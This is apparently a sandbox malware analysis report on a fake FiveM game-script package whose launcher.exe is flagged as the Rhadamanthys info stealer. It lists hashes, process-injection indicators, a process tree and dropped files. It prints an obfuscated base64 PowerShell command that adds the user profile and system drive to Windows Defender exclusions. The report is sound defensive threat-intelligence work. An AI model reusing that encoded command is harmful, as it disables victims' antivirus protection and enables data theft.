Resubmissions
- 27-03-2024 17:10  240327-vp3klabh7y  (score 10)
- 27-03-2024 17:07  240327-vnfdnsbh4w  (score 3)
- 27-03-2024 17:03  240327-vknwmsbg61  (score 10)
Analysis
- max time kernel: 119s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 27-03-2024 17:03
Static task: static1
Behavioral task behavioral1: Sample SKRIPTGG-FIVEM-main.zip, Resource win7-20240221-en
Behavioral task behavioral2: Sample SKRIPTGG-FIVEM-main.zip, Resource win10v2004-20240226-en
Behavioral task behavioral3: Sample SKRIPTGG-FIVEM-main/README.md, Resource win7-20240221-en
Behavioral task behavioral4: Sample SKRIPTGG-FIVEM-main/README.md, Resource win10v2004-20231215-en
Behavioral task behavioral5: Sample SKRIPTGG-FIVEM-main/Skript.rar, Resource win7-20240215-en
Behavioral task behavioral6: Sample SKRIPTGG-FIVEM-main/Skript.rar, Resource win10v2004-20240226-en
Behavioral task behavioral7: Sample launcher.exe, Resource win7-20240221-en
Behavioral task behavioral8: Sample launcher.exe, Resource win10v2004-20240226-en
Behavioral task behavioral9: Sample SKRIPTGG-FIVEM-main/license.dll, Resource win7-20240221-en
Behavioral task behavioral10: Sample SKRIPTGG-FIVEM-main/license.dll, Resource win10v2004-20240226-en
General
- Target: launcher.exe
- Size: 4.7MB
- MD5: 620024df612c13a4a33cf785384c2086
- SHA1: a6ae999723bea18c6d3acf2c52ed682f6226b7be
- SHA256: cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1
- SHA512: 34d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd
- SSDEEP: 98304:HqZRVmbr2CkyPqPnowAWTbNJ2EyT2QT27JaSGKN/3pJ:QVs6ysoDEUvwJEKdZJ
Malware Config
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++, first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes (description / pid / Process / procid_target):
  PID 2312 created 1200 / 2312 / svchost.exe / 21
- Executes dropped EXE (3 IoCs)
  Processes (pid / Process):
  1728 / explorer.exe
  2312 / svchost.exe
  2708 / explorer.exe
- Loads dropped DLL (5 IoCs)
  Processes (pid / Process):
  2088 / launcher.exe  (3 entries)
  1728 / explorer.exe
  2708 / explorer.exe
- yara_rule upx (signature name missing from the page)
  Processes (resource / yara_rule):
  behavioral7/files/0x0006000000016a9a-33.dat / upx
  behavioral7/memory/2708-35-0x000007FEF5C90000-0x000007FEF60F6000-memory.dmp / upx
- Detects Pyinstaller (1 IoC)
  Processes (resource / yara_rule):
  behavioral7/files/0x000a0000000122b8-2.dat / pyinstaller
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes (pid / Process):
  2016 / powershell.exe
  2312 / svchost.exe  (2 entries)
  2444 / dialer.exe  (4 entries)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description / pid / Process):
  Token: SeDebugPrivilege / 2016 / powershell.exe
- Suspicious use of WriteProcessMemory (30 IoCs)
  Processes (description / pid / Process / procid_target), duplicate entries collapsed with a count:
  PID 2088 wrote to memory of 2016 / 2088 / launcher.exe / 28  (7 entries)
  PID 2088 wrote to memory of 1728 / 2088 / launcher.exe / 30  (4 entries)
  PID 2088 wrote to memory of 2312 / 2088 / launcher.exe / 31  (7 entries)
  PID 1728 wrote to memory of 2708 / 1728 / explorer.exe / 32  (3 entries)
  PID 2312 wrote to memory of 2444 / 2312 / svchost.exe / 33  (9 entries)
Processes (tree; indentation shows parent/child depth, path followed by command line)
C:\Windows\Explorer.EXE  ("C:\Windows\Explorer.EXE")  PID:1200
  C:\Users\Admin\AppData\Local\Temp\launcher.exe  ("C:\Users\Admin\AppData\Local\Temp\launcher.exe")  PID:2088
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA=")  PID:2016
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      (The -EncodedCommand value is base64 of UTF-16LE text and decodes to: <#giz#>Add-MpPreference <#xfg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zrg#> -Force <#dac#> ; that is, it adds the user profile and the whole system drive to the Windows Defender exclusion list, with junk block comments inserted between the tokens.)
    C:\Users\Admin\AppData\Local\Temp\explorer.exe  ("C:\Users\Admin\AppData\Local\Temp\explorer.exe")  PID:1728
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\explorer.exe  ("C:\Users\Admin\AppData\Local\Temp\explorer.exe")  PID:2708
        - Executes dropped EXE
        - Loads dropped DLL
    C:\Users\Admin\AppData\Local\svchost.exe  ("C:\Users\Admin\AppData\Local\svchost.exe")  PID:2312
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\dialer.exe  ("C:\Windows\system32\dialer.exe")  PID:2444
    - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1.4MB
  MD5: 3f782cf7874b03c1d20ed90d370f4329
  SHA1: 08a2b4a21092321de1dcad1bb2afb660b0fa7749
  SHA256: 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
  SHA512: 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
- Filesize: 355KB
  MD5: 8a6f1580a5b9b94d7cd47cc6b1af1b9a
  SHA1: e68768afd59e18091d345cb300e859572e8d4c5c
  SHA256: bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe
  SHA512: 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309
- Filesize: 4.4MB
  MD5: aba4fcf0d72b487887f315202bc43ae4
  SHA1: de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8
  SHA256: 8f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef
  SHA512: fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9